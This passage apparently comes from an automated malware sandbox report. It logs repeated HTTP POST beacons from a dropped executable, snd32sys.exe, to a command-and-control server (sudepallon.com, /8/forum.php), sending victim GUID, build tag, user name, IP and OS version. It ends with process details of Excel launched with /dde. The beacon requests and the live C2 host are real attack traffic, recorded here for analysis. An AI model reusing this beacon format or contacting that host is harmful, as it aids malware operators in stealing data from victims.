                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCAZXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  40192.168.2.34979477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:09.661709070 CEST6069OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:09.730118990 CEST6069INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTNMGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  41192.168.2.34979577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.059182882 CEST6070OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.127449989 CEST6070INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNTGMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  42192.168.2.34979677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.434488058 CEST6071OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.502567053 CEST6071INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQFUJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  43192.168.2.34979777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.798916101 CEST6072OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.867554903 CEST6073INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTHSGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  44192.168.2.34979877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:12.563224077 CEST6073OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:12.632021904 CEST6074INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMMNNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  45192.168.2.34979977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:12.942617893 CEST6074OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.008268118 CEST6075INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNYBMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  46192.168.2.34980077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:13.320719004 CEST6076OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.388214111 CEST6076INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cVZAEARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  47192.168.2.34980177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:13.690525055 CEST6077OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.764219046 CEST6077INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4d 4e 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTMNGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  48192.168.2.34980277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:14.084805965 CEST6078OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:14.151746035 CEST6078INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNYBMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  5192.168.2.34975977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:54.344192028 CEST5702OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:54.414891005 CEST5703INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cZNMAARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  6192.168.2.34976077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:54.742374897 CEST5716OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:54.810606956 CEST5801INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTKPGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  7192.168.2.34976177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:55.212100029 CEST6031OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:55.280215025 CEST6031INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBHSYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  8192.168.2.34976277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:55.649635077 CEST6032OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:55.718817949 CEST6032INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHGTSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  9192.168.2.34976377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.101624966 CEST6033OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:56.167244911 CEST6033INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cKMNPARRABw==0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 6120 Parent PID: 5616

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
                                                                                                                                                  Imagebase:0xb0000
                                                                                                                                                  File size:27110184 bytes
